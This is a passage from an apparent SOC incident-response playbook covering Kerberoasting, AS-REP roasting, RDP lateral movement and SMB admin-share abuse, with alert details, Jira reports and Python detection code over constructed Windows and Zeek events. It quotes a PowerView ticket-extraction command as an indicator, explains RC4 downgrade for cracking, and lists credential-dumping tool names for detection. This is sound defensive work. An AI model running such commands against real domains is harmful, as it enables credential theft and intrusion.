14:03:01 – TGS-REQ for service: CIFS/filesrv-02.company.com
(continuing – total 87 requests in 15 minutes)
Service Account SPNs Targeted:
SQL Service accounts (12 requests)
Web service accounts (8 requests)
File server accounts (15 requests)
Other service accounts (52 requests)
Detection Logic:
87 TGS requests in 15 minutes (highly anomalous)
User rpatel normally requests 0-2 TGS per day
Requests for multiple service accounts (not just those user needs)
Pattern matches Kerberoasting attack (requesting service tickets for offline cracking)
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed Kerberoasting activity |
| 2. Process Investigation | Identify source on ENG-WS-045 | CrowdStrike Falcon | PowerView script (Get-NetUser -SPN) running |
| 3. User Interview | Contact rpatel | Teams, Phone | User did NOT run this (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
| 6. Service Account Audit | Review service account passwords | IT Ops | 23 targeted service accounts reviewed; 3 weak and 8 moderate passwords flagged |
Jira Incident Report
Ticket: SOC-2024-202
Summary: T1558.003 – Kerberoasting Attack from Compromised Engineering Account
Status: RESOLVED
Resolution: MALICIOUS – Tickets Requested, Service Account Passwords Rotated
Priority: P2 – MEDIUM
Labels: T1558, kerberoasting, service-tickets, mdi, compromised-account
Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Kerberos Service Ticket Requests – Kerberoasting”.
Source Host: ENG-WS-045 (Engineering, user rpatel).
Requests: 87 TGS requests in 15 minutes.
Time: 2024-03-11 14:15 EST.
Technique: MITRE ATT&CK T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting.
2. Technical Analysis:
Attack Chain:
13:30 – rpatel account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
14:00 – Attacker runs PowerView script to enumerate SPNs
14:00-14:15 – Attacker requests TGS tickets for service accounts
14:15 – MDI detects
Kerberoasting Technique:
Goal: Request service tickets (TGS) for user accounts that carry SPNs (computer accounts have random passwords and are not worth cracking)
The ticket’s encrypted part is protected with a key derived from the service account’s password; when RC4 (etype 23) is negotiated that key is the NT hash itself, which is why attackers request RC4 even for accounts that support AES
Offline cracking: Attacker takes tickets offline, cracks passwords; no further contact with the domain is needed
Result: If successful, attacker has service account credentials
Check: Event 4769 with TicketEncryptionType 0x17 for an AES-capable account is itself a signal, independent of request volume
Data Obtained:
87 encrypted service tickets
Tickets for 23 unique service accounts
Tickets saved to C:\Users\rpatel\Desktop\tickets.kirbi (the recovered command writes Hashcat-format hashes rather than .kirbi tickets; either form is crackable offline)
Service Account Password Strength:
12 accounts with strong/complex passwords (safe)
8 accounts with moderate passwords (crackable in weeks)
3 accounts with weak passwords (crackable in days) – flagged
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
14:00-14:15 – Ticket requests
14:15 – Alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Account disabled
Indicators of Compromise (IoCs):
Files:
– C:\Users\rpatel\Desktop\tickets.kirbi (87 tickets)
Commands:
– Get-NetUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045.
Deleted tickets.kirbi file.
Disabled rpatel account.
Reset password.
Service Account Remediation:
Identified 23 service accounts targeted.
Rotated passwords for all 23 accounts.
Enforced strong password policy for service accounts.
Host Remediation:
Reimaged ENG-WS-045.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to perform Kerberoasting.
Contributing Factors:
No MFA on account.
Service accounts had weak passwords (some).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: 87 encrypted tickets obtained (passwords rotated).
7. Remediation & Prevention:
Completed Actions:
Tickets deleted.
Service account passwords rotated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented strong password policy for service accounts.
Enhanced monitoring for TGS requests.
Deployed managed service accounts (gMSA) where possible.
8. Conclusion:
An attacker compromised an engineering account and performed Kerberoasting, requesting 87 service tickets for offline cracking. MDI detected the anomalous TGS requests, enabling deletion of the tickets and rotation of all targeted service account passwords.
Closure Rationale: Tickets obtained; the local copy was deleted, but copies already taken offline cannot be recalled, so the service account password rotation is the effective control; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 15:30 EST
163. T1558.004 – AS-REP Roasting (Splunk Detection on AD Logs)
Splunk Alert Details
Alert ID: SPLUNK-ASREP-ROAST-1558-7842
Alert Time: 2024-03-11 11:30:22 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security + AD Logs
Rule: “AS-REP Roasting Attack Detected”
MITRE ATT&CK: T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting
Alert Details:
Correlated Events:
Windows Event ID 4768 (Kerberos Authentication Ticket Request):
Time: 11:15-11:30 EST
Source Host: 192.168.47.89 (Unknown host on Guest WiFi)
Target Users: Multiple users with “Do not require Kerberos preauthentication” enabled
Request Type: AS-REQ (no preauthentication)
Users Targeted:
svc_backup (service account) – preauth disabled
svc_monitoring (service account) – preauth disabled
user_nopreauth (legacy user) – preauth disabled
(12 total accounts)
Event Details (sample):
Event ID: 4768
Account Name: svc_backup
Account Domain: COMPANY
Logon GUID: {12345678-1234-1234-1234-123456789012}
Pre-Authentication Type: 0 (none)
Failure Code: 0x0 (success)
IP Address: 192.168.47.89
Detection Logic:
Multiple AS-REQ requests without preauthentication
Targeting accounts with “Do not require preauth” flag
Source IP unknown (Guest WiFi)
Pattern matches AS-REP Roasting attack
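One added example covering both this section’s AS-REP logic and the Kerberoasting logic of report 162 above, run over constructed Windows Security events 4768 and 4769. It is not MDI’s or Splunk’s rule and not the page’s own code; thresholds, hosts, times and account names are assumptions:

```python
"""Roasting detection over Windows Kerberos audit events (4769 and 4768).

Added example, not MDI's or Splunk's rule. Events are dicts using the field
names of the Windows Security log: 4769 carries TargetUserName (requester),
ServiceName (the service account), TicketEncryptionType, IpAddress and
Status; 4768 carries TargetUserName (the account), PreAuthType,
TicketEncryptionType, IpAddress and Status. Samples are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # etype 23: ticket key is the account's NT hash, cheapest to crack
NO_PREAUTH = "0"    # PreAuthType 0: the AS-REQ carried no pre-authentication data
SUCCESS = "0x0"


def _when(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def detect_kerberoast(events, window=timedelta(minutes=15), min_spns=10):
    """One hit per (user, source IP) that pulls >= min_spns distinct service
    tickets inside the window. Computer accounts and krbtgt are skipped:
    their keys are random and not a cracking target."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev["Status"] != SUCCESS:
            continue
        svc = ev["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_src[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    hits = []
    for (user, ip), evs in by_src.items():
        evs.sort(key=_when)
        for i, first in enumerate(evs):
            in_win = [e for e in evs[i:] if _when(e) - _when(first) <= window]
            spns = {e["ServiceName"] for e in in_win}
            if len(spns) >= min_spns:
                hits.append({"user": user, "ip": ip, "distinct_spns": len(spns),
                             "rc4_requests": sum(e["TicketEncryptionType"] == RC4_HMAC
                                                 for e in in_win),
                             "first": first["TimeCreated"]})
                break
    return hits


def detect_asrep_roast(events, min_accounts=3):
    """Successful 4768 without pre-authentication, grouped by source IP.

    A failed 4768 (Status 0x19, KDC_ERR_PREAUTH_REQUIRED) with PreAuthType 0
    is the normal first leg of a Kerberos logon; only a *successful* AS-REP
    issued without pre-authentication hands the requester crackable material.
    """
    by_ip = defaultdict(set)
    for ev in events:
        if (ev["EventID"] == 4768 and ev["PreAuthType"] == NO_PREAUTH
                and ev["Status"] == SUCCESS):
            by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return [{"ip": ip, "accounts": sorted(accts)}
            for ip, accts in by_ip.items() if len(accts) >= min_accounts]


# Constructed sample events mirroring both incidents.
def _tgs(user, ip, svc, etype, t):
    return {"EventID": 4769, "TimeCreated": t, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": svc, "TicketEncryptionType": etype, "Status": SUCCESS}


def _asreq(user, ip, preauth, status, t):
    return {"EventID": 4768, "TimeCreated": t, "TargetUserName": user, "IpAddress": ip,
            "PreAuthType": preauth, "TicketEncryptionType": RC4_HMAC, "Status": status}


_SPNS = ["svc_sql01", "svc_sql02", "svc_sql03", "svc_web01", "svc_web02", "svc_fs01",
         "svc_fs02", "svc_backup", "svc_monitor", "svc_report", "svc_etl", "svc_ci"]
SAMPLE_EVENTS = (
    # rpatel: 12 user-account SPNs, all RC4, inside six minutes
    [_tgs("rpatel", "192.168.45.78", s, RC4_HMAC,
          "2024-03-11 14:%02d:%02d" % divmod(15 + 30 * i, 60)) for i, s in enumerate(_SPNS)]
    + [_tgs("rpatel", "192.168.45.78", "WS-045$", RC4_HMAC, "2024-03-11 14:06:00")]
    # jdoe: ordinary AES tickets for two services
    + [_tgs("jdoe", "192.168.45.12", "svc_sql01", "0x12", "2024-03-11 14:01:00"),
       _tgs("jdoe", "192.168.45.12", "svc_fs01", "0x12", "2024-03-11 14:03:00")]
    # guest-WiFi host: successful AS-REPs without preauth for three accounts
    + [_asreq(u, "192.168.47.89", NO_PREAUTH, SUCCESS, "2024-03-11 11:%02d:00" % (15 + i))
       for i, u in enumerate(["svc_backup", "svc_monitoring", "user_nopreauth"])]
    # jdoe: the normal two-step logon (preauth required, then PA-ENC-TIMESTAMP)
    + [_asreq("jdoe", "192.168.45.12", NO_PREAUTH, "0x19", "2024-03-11 11:20:00"),
       _asreq("jdoe", "192.168.45.12", "2", SUCCESS, "2024-03-11 11:20:01")]
)

if __name__ == "__main__":
    print(detect_kerberoast(SAMPLE_EVENTS))
    print(detect_asrep_roast(SAMPLE_EVENTS))
```

Requiring Status 0x0 on the 4768 leg is what keeps the AS-REP rule quiet on every ordinary logon, and counting RC4 requests separately on the 4769 leg lets the Kerberoast rule fire on a small number of downgraded requests as well as on volume.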
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed AS-REP Roasting activity |
| 2. Source Investigation | Identify source IP | DHCP Logs, Cisco ISE | Guest WiFi IP assigned to unknown device |
| 3. Physical Security | Locate device | WiFi Controller, Security | Device in lobby; user unknown |
| 4. Immediate Action | Block source IP/MAC | Cisco ISE, Firewall | Guest device blocked |
| 5. Account Remediation | Require preauthentication for affected accounts | AD | “Do not require Kerberos preauthentication” cleared on all 12 accounts |
| 6. Password Rotation | Rotate passwords for affected accounts | AD | 12 account passwords rotated |
Jira Incident Report
Ticket: SOC-2024-203
Summary: T1558.004 – AS-REP Roasting Attack Targeting Accounts with Preauth Disabled
Status: RESOLVED
Resolution: MALICIOUS – Tickets Obtained, Preauth Enabled, Passwords Rotated
Priority: P2 – MEDIUM
Labels: T1558, as-rep-roasting, kerberos, splunk, guest-wifi
Components: Identity-Management, Network-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security (AD logs).
Alert: “AS-REP Roasting Attack Detected”.
Source IP: 192.168.47.89 (Guest WiFi).
Targets: 12 accounts with preauthentication disabled.
Time: 2024-03-11 11:30 EST.
Technique: MITRE ATT&CK T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting.
2. Technical Analysis:
Attack Chain:
11:00 – Unknown individual enters lobby, connects to Guest WiFi
11:10 – Attacker enumerates AD for accounts with preauth disabled
11:15-11:30 – AS-REP Roasting attack (12 accounts)
11:30 – Splunk detects
AS-REP Roasting Technique:
Target: Accounts with “Do not require Kerberos preauthentication” enabled
Method: Send an AS-REQ without preauthentication; the KDC answers with an AS-REP whose encrypted part is keyed by the account’s password, so the attacker needs no credentials beyond a username list and reachability of the KDC on port 88
Offline cracking: Attacker cracks the encrypted part to recover the password
Accounts Targeted (12):
svc_backup (service account) – weak password
svc_monitoring (service account) – moderate password
user_nopreauth (legacy user) – weak password
(9 others) – various
Attacker Success:
Obtained encrypted AS-REP for all 12 accounts
Could crack weak passwords offline
3. Investigation Findings:
Timeline:
11:00 – Attacker connects to Guest WiFi
11:10 – Account enumeration
11:15-11:30 – AS-REP Roasting
11:30 – Alert
11:32 – SOC investigates
11:33 – Source IP blocked
11:35 – Preauth enabled for all affected accounts
Indicators of Compromise (IoCs):
Network:
– Source IP: 192.168.47.89 (Guest WiFi)
– MAC: 00:1A:2B:3C:4D:5E (unknown)
Accounts:
– 12 accounts with preauth disabled (list attached)
4. Containment Actions:
Immediate Actions:
Blocked source IP and MAC at network level.
Enabled preauthentication requirement for all 12 accounts.
Rotated passwords for all 12 accounts.
Physical Security:
Increased monitoring of lobby area.
Guest WiFi network isolated from internal network.
Enterprise-wide Actions:
Audited all AD accounts for preauth disabled flag.
Found 3 additional accounts; corrected.
5. Root Cause Analysis:
Primary Cause: Accounts had “Do not require Kerberos preauthentication” enabled (legacy settings).
Contributing Factors:
Guest WiFi accessible from lobby.
No network segmentation for Guest WiFi.
6. Business Impact:
Operational Impact: None.
Data Exposure: 12 encrypted tickets obtained; passwords rotated.
7. Remediation & Prevention:
Completed Actions:
Preauth enabled.
Passwords rotated.
Attacker blocked.
Technical Controls Enhanced:
Audited and removed all accounts with preauth disabled.
Implemented network segmentation for Guest WiFi.
Enhanced monitoring for AS-REQ without preauth.
8. Conclusion:
An attacker on Guest WiFi performed AS-REP Roasting against 12 accounts with preauthentication disabled, obtaining encrypted tickets. Splunk detected the anomalous AS-REQ patterns, enabling rapid remediation and password rotation.
Closure Rationale: AS-REP material obtained, but every password it protects was rotated, so cracking it yields nothing current; preauth enabled; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 12:30 EST
164. T1021.001 – Remote Desktop Protocol (Cisco ISE Detection)
Cisco ISE Alert Details
Alert ID: ISE-RDP-LATERAL-1021-7842
Alert Time: 2024-03-11 16:30:45 EST
Severity: HIGH (85/100)
Source: Cisco Identity Services Engine (ISE)
Rule: “Unusual RDP Connection – Potential Lateral Movement”
MITRE ATT&CK: T1021.001 – Remote Services: Remote Desktop Protocol
Alert Details:
Detection: RDP connection from non-admin workstation to critical server
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.10 (DC-01 – Domain Controller)
User: rpatel@company.com (Engineer – not IT admin)
Time: 16:25-16:30 EST
Protocol: RDP (TCP/3389)
Session Duration: 5 minutes
Contextual Anomalies:
User rpatel has no business need for RDP to DC
Engineering workstations should not connect to domain controllers
Session to DC-01 lasted only 5 minutes (brief, tool-driven interaction rather than administrative work)
Multiple RDP connections to other servers in last hour:
15:45 – RDP to FILESRV-01 (file server)
16:00 – RDP to SQL-SRV-01 (SQL server)
16:15 – RDP to WEB-SRV-01 (web server)
16:25 – RDP to DC-01 (domain controller)
Detection Logic:
Lateral movement pattern (RDP hopping)
Each hop reaches a more sensitive tier (file server, database, web server, then domain controller)
Engineer completing an interactive logon to a domain controller (highly anomalous; a standard user should not hold that right)
Pattern matches attacker moving laterally to gain domain admin access
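An added example that reproduces the hop-chain logic over destination-side 4624 logon events (logon type 10), since ISE telemetry is not available offline; it is not Cisco’s rule and not the page’s own code, and the tiering, jump-host list and sample events are assumptions:

```python
"""RDP hop-chain detection over Windows 4624 logon events (LogonType 10).

Added example; Cisco ISE is not available offline, so this reproduces the
alert's logic on the destination-side Security log instead. Each dict uses
the 4624 field names: Computer (where the logon landed), TargetUserName,
IpAddress (where it came from), LogonType and TimeCreated. Hosts, tiers
and the jump-host list are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

REMOTE_INTERACTIVE = "10"
TIER0 = {"DC-01", "DC-02"}                        # domain controllers
SERVERS = TIER0 | {"FILESRV-01", "SQL-SRV-01", "WEB-SRV-01"}
JUMP_HOSTS = {"192.168.20.5"}                     # only sanctioned RDP source for servers


def _when(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def rdp_chains(events, window=timedelta(hours=1), min_hops=3):
    """Group RDP logons by (user, source IP) and report chains that either
    reach a tier-0 host from a non-jump source or hop across >= min_hops
    distinct servers inside the window measured from the first logon."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["LogonType"] == REMOTE_INTERACTIVE and ev["Computer"] in SERVERS:
            by_src[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    report = []
    for (user, ip), evs in by_src.items():
        evs.sort(key=_when)
        start = _when(evs[0])
        hops, seen = [], set()
        for e in evs:
            if _when(e) - start > window:
                break
            if e["Computer"] not in seen:
                seen.add(e["Computer"])
                hops.append(e["Computer"])
        tier0_hit = bool(seen & TIER0) and ip not in JUMP_HOSTS
        if tier0_hit or len(hops) >= min_hops:
            report.append({"user": user, "source": ip, "hops": hops,
                           "severity": "critical" if tier0_hit else "high"})
    return report


def _logon(computer, user, ip, t, ltype=REMOTE_INTERACTIVE):
    return {"Computer": computer, "TargetUserName": user, "IpAddress": ip,
            "LogonType": ltype, "TimeCreated": t}


# Constructed sample: the incident's chain, an admin on the jump host, and
# an ordinary user touching one file server (once by RDP, once by SMB).
SAMPLE_EVENTS = [
    _logon("FILESRV-01", "rpatel", "192.168.45.78", "2024-03-11 15:45:00"),
    _logon("SQL-SRV-01", "rpatel", "192.168.45.78", "2024-03-11 16:00:00"),
    _logon("WEB-SRV-01", "rpatel", "192.168.45.78", "2024-03-11 16:15:00"),
    _logon("DC-01", "rpatel", "192.168.45.78", "2024-03-11 16:25:00"),
    _logon("DC-01", "it_admin", "192.168.20.5", "2024-03-11 16:00:00"),
    _logon("FILESRV-01", "jdoe", "192.168.45.12", "2024-03-11 16:10:00"),
    _logon("FILESRV-01", "jdoe", "192.168.45.12", "2024-03-11 16:12:00", ltype="3"),
]

if __name__ == "__main__":
    for chain in rdp_chains(SAMPLE_EVENTS):
        print(chain["severity"].upper(), chain["user"], "from", chain["source"],
              " -> ".join(chain["hops"]))
```

The tier-0 rule fires on the first DC logon regardless of chain length, which is the detection that would have fired forty minutes earlier than the ISE pattern if DC-01 had been forwarding 4624 events in near real time.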
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Cisco ISE alert | ISE Console, AD Logs | Confirmed anomalous RDP connections |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host compromised (Cobalt Strike) |
| 3. Immediate Action | Isolate ENG-WS-045 | CrowdStrike | Source host quarantined |
| 4. Destination Check | Verify DC-01 status | CrowdStrike Falcon | DC-01 not compromised (yet) |
| 5. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
| 6. Threat Hunting | Check for other RDP connections | ISE, Splunk | No other anomalous connections found |
Jira Incident Report
Ticket: SOC-2024-204
Summary: T1021.001 – RDP Lateral Movement from Compromised Engineering Host to DC
Status: RESOLVED
Resolution: MALICIOUS – Lateral Movement Stopped
Priority: P1 – CRITICAL
Labels: T1021, rdp, lateral-movement, cisco-ise, compromised-host
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Identity Services Engine (ISE).
Alert: “Unusual RDP Connection – Potential Lateral Movement”.
Source: ENG-WS-045 (Engineering, IP 192.168.45.78).
Destinations: FILESRV-01, SQL-SRV-01, WEB-SRV-01, DC-01.
User: rpatel@company.com (compromised).
Time: 2024-03-11 16:30 EST.
Technique: MITRE ATT&CK T1021.001 – Remote Services: Remote Desktop Protocol.
2. Technical Analysis:
Attack Chain:
15:00 – rpatel account compromised via phishing
15:15 – Attacker logs into ENG-WS-045 via RDP (from external)
15:30 – Attacker enumerates network, identifies targets
15:45 – RDP to FILESRV-01 (file server)
16:00 – RDP to SQL-SRV-01 (SQL server)
16:15 – RDP to WEB-SRV-01 (web server)
16:25 – RDP to DC-01 (domain controller)
16:30 – ISE detects
Lateral Movement Pattern:
FILESRV-01: Attacker checked for sensitive files (none stolen)
SQL-SRV-01: Attacker enumerated databases (schema only)
WEB-SRV-01: Attacker checked web configs (found no credentials)
DC-01: Attacker attempted to enable WMI for persistence (blocked)
Attacker Intent:
Move laterally to gain access to domain controller
Escalate privileges to domain admin
Establish persistence for ransomware
3. Investigation Findings:
Timeline:
15:00 – Account compromised
15:15 – Attacker logs into ENG-WS-045
15:45-16:25 – RDP hopping
16:30 – Alert
16:32 – SOC investigates
16:33 – ENG-WS-045 isolated
16:34 – rpatel account disabled
Indicators of Compromise (IoCs):
Network:
– RDP from ENG-WS-045 (192.168.45.78) to multiple servers
Account:
– rpatel (compromised)
Host:
– ENG-WS-045 (Cobalt Strike beacon)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045.
Disabled rpatel account.
Reset password.
Verified no compromise on destination servers.
Removed any created persistence.
Network Remediation:
Restricted RDP to DC from specific admin jump hosts only.
Enhanced monitoring for RDP to critical servers.
Host Remediation:
Reimaged ENG-WS-045.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing RDP lateral movement.
Contributing Factors:
No MFA on account.
RDP allowed from any internal host to critical servers.
No network segmentation.
rpatel’s account was able to complete an RDP logon to DC-01, a right no standard user should hold; interactive-logon rights and local group memberships on every server reached need review.
6. Business Impact:
Operational Impact: Engineering host offline; multiple servers accessed.
Data Exposure: No data stolen.
7. Remediation & Prevention:
Completed Actions:
Lateral movement stopped.
Account secured.
Hosts verified clean.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented network segmentation.
Restricted RDP to critical servers.
Enhanced monitoring for RDP connections.
8. Conclusion:
An attacker used a compromised engineering account to perform RDP lateral movement across multiple servers, culminating in an attempt to access the domain controller. ISE detected the anomalous RDP pattern and enabled isolation before domain compromise.
Closure Rationale: Lateral movement stopped; account secured; DC not compromised.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 17:30 EST
165. T1021.002 – SMB/Windows Admin Shares (Zeek Detection)
Zeek Alert Details
Alert ID: ZEEK-SMB-LATERAL-1021-7842
Alert Time: 2024-03-11 10:30:22 EST
Severity: HIGH (85/100)
Source: Zeek Network Security Monitor
Rule: “SMB Admin Share Access – Potential Lateral Movement”
MITRE ATT&CK: T1021.002 – Remote Services: SMB/Windows Admin Shares
Alert Details:
Detection: Access to ADMIN$ or C$ shares from non-admin workstation
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 192.168.10.50 (FILESRV-01 – File Server)
Protocol: SMB (TCP/445)
Time: 10:15-10:30 EST
SMB Commands:
10:15:22 – SMB2 Create Request: \\192.168.10.50\ADMIN$ (admin share)
10:15:25 – SMB2 Create Response: SUCCESS
10:15:28 – SMB2 Write: writing \\192.168.10.50\ADMIN$\System32\psexesvc.exe
10:15:35 – SMB2 Create: \\192.168.10.50\C$\Windows\Temp\mimikatz.exe
10:15:42 – SMB2 Write: writing mimikatz.exe
10:16:05 – SMB2 Create: \\192.168.10.50\ADMIN$\System32\tasks\update.ps1
10:16:12 – SMB2 Write: writing update.ps1
10:16:30 – SMB2 Close
File Transfers:
psexesvc.exe (PsExec service) – 124 KB
mimikatz.exe – 1.2 MB
update.ps1 – 4 KB (PowerShell script)
Detection Logic:
Access to ADMIN$ share (requires admin privileges)
Source host is engineering workstation (not IT admin)
Transfer of hacking tools (mimikatz)
PowerShell script for persistence
Pattern matches lateral movement and tool deployment
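The detection logic above, as an added example (not Zeek's own rule code): a scorer over Zeek smb_files.log-style records that flags admin-share writes from hosts outside a sanctioned admin network and weights them by what was written. The records, the ADMIN_JUMP_NET subnet and the TOOL_NAMES list are constructed assumptions that mirror the alert.

```python
"""Zeek smb_files.log triage for admin-share abuse (T1021.002).

Added example, not Zeek's own detection code. The records below are constructed
to mirror the alert above; ADMIN_JUMP_NET and TOOL_NAMES are assumptions."""
import ipaddress
import re
from collections import defaultdict

# Matches \\host\ADMIN$, \\host\C$, \\host\D$ ... (Zeek records the tree path this way).
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\(?:ADMIN\$|[A-Za-z]\$)$")
# Hypothetical: the only hosts that should legitimately touch admin shares.
ADMIN_JUMP_NET = ipaddress.ip_network("192.168.100.0/24")
# Illustrative filenames of common lateral-movement tooling; keep a real list as threat intel.
TOOL_NAMES = {"psexesvc.exe", "paexec.exe", "mimikatz.exe", "procdump.exe"}
SCRIPT_EXT = (".ps1", ".bat", ".cmd", ".vbs")

# Constructed smb_files.log rows (Zeek field names); sizes are the alert's values in bytes.
SMB_FILES_LOG = [
    {"ts": "2024-03-11T10:15:22", "id.orig_h": "192.168.45.78", "id.resp_h": "192.168.10.50",
     "action": "SMB::FILE_OPEN", "path": "\\\\192.168.10.50\\ADMIN$", "name": "System32\\psexesvc.exe", "size": 0},
    {"ts": "2024-03-11T10:15:28", "id.orig_h": "192.168.45.78", "id.resp_h": "192.168.10.50",
     "action": "SMB::FILE_WRITE", "path": "\\\\192.168.10.50\\ADMIN$", "name": "System32\\psexesvc.exe", "size": 126976},
    {"ts": "2024-03-11T10:15:42", "id.orig_h": "192.168.45.78", "id.resp_h": "192.168.10.50",
     "action": "SMB::FILE_WRITE", "path": "\\\\192.168.10.50\\C$", "name": "Windows\\Temp\\mimikatz.exe", "size": 1258291},
    {"ts": "2024-03-11T10:16:12", "id.orig_h": "192.168.45.78", "id.resp_h": "192.168.10.50",
     "action": "SMB::FILE_WRITE", "path": "\\\\192.168.10.50\\ADMIN$", "name": "System32\\tasks\\update.ps1", "size": 4096},
    # Benign: patch deployment from a sanctioned admin host.
    {"ts": "2024-03-11T10:20:00", "id.orig_h": "192.168.100.10", "id.resp_h": "192.168.10.50",
     "action": "SMB::FILE_WRITE", "path": "\\\\192.168.10.50\\ADMIN$", "name": "Temp\\update.msu", "size": 52428800},
    # Benign: ordinary user share access from the same engineering host.
    {"ts": "2024-03-11T10:21:00", "id.orig_h": "192.168.45.78", "id.resp_h": "192.168.10.50",
     "action": "SMB::FILE_OPEN", "path": "\\\\192.168.10.50\\Engineering", "name": "specs.docx", "size": 0},
]


def detect_admin_share_abuse(records, admin_net=ADMIN_JUMP_NET):
    """Return {(src, dst): evidence} for admin-share activity from non-admin hosts.

    Score: 40 for any admin-share access from outside admin_net, +25 per known
    tool written, +10 per script written, capped at 100."""
    findings = defaultdict(lambda: {"tools": [], "scripts": [], "bytes_written": 0})
    for r in records:
        if not ADMIN_SHARE.match(r["path"]):
            continue
        if ipaddress.ip_address(r["id.orig_h"]) in admin_net:
            continue  # sanctioned admin host: admin-share use is expected
        f = findings[(r["id.orig_h"], r["id.resp_h"])]  # an open alone records the pair
        if r["action"] != "SMB::FILE_WRITE":
            continue  # only writes add evidence beyond the access itself
        base = r["name"].rsplit("\\", 1)[-1].lower()
        f["bytes_written"] += r["size"]
        if base in TOOL_NAMES:
            f["tools"].append(base)
        elif base.endswith(SCRIPT_EXT):
            f["scripts"].append(base)
    for f in findings.values():
        f["score"] = min(100, 40 + 25 * len(f["tools"]) + 10 * len(f["scripts"]))
    return dict(findings)


if __name__ == "__main__":
    for (src, dst), f in detect_admin_share_abuse(SMB_FILES_LOG).items():
        print(f"{src} -> {dst}: score={f['score']} tools={f['tools']} scripts={f['scripts']}")
```

The allowlist is the part that decides the false-positive rate: patch management, EDR deployment and backup agents all write to ADMIN$ routinely, so the sanctioned set has to be maintained, and a write to ADMIN$ from anywhere else is worth a ticket even without a recognisable tool name, because renaming psexesvc.exe costs the attacker nothing.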
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Zeek alert | Zeek Logs, Splunk | Confirmed SMB admin share access and tool transfer |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host compromised (Cobalt Strike) |
| 3. Destination Investigation | Check FILESRV-01 | CrowdStrike Falcon | Files transferred but not executed yet |
| 4. Immediate Action | Isolate both hosts | CrowdStrike | Both hosts quarantined |
| 5. File Removal | Delete transferred files | CrowdStrike Live Response | psexesvc.exe, mimikatz.exe, update.ps1 deleted |
| 6. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-205
Summary: T1021.002 – SMB Admin Share Lateral Movement and Tool Transfer
Status: RESOLVED
Resolution: MALICIOUS – Lateral Movement Stopped, Tools Removed
Priority: P2 – MEDIUM
Labels: T1021, smb, admin-shares, lateral-movement, zeek, compromised-host
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “SMB Admin Share Access – Potential Lateral Movement”.
Source: ENG-WS-045 (Engineering, compromised).
Destination: FILESRV-01 (File Server).
Activity: Access to ADMIN$, transfer of hacking tools.
Time: 2024-03-11 10:30 EST.
Technique: MITRE ATT&CK T1021.002 – Remote Services: SMB/Windows Admin Shares.
2. Technical Analysis:
Attack Chain:
09:30 – rpatel account compromised
09:45 – Attacker logs into ENG-WS-045
10:00 – Attacker enumerates network, finds FILESRV-01
10:15 – Connects to ADMIN$ share using stolen credentials
10:15-10:25 – Transfers psexesvc.exe, mimikatz.exe, update.ps1
10:25 – Files staged on FILESRV-01
10:30 – Zeek detects
Transferred Files:
psexesvc.exe: PsExec service (for remote execution)
mimikatz.exe: Credential dumping tool
update.ps1: PowerShell script that:
– checks whether it is running as admin
– if so, downloads and executes an additional payload
– adds persistence via a scheduled task
Attacker Intent:
Use FILESRV-01 as a staging point
Later execute tools remotely via PsExec
Dump credentials from file server
Destination Status:
Files transferred but not executed
No compromise of FILESRV-01 yet
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker on ENG-WS-045
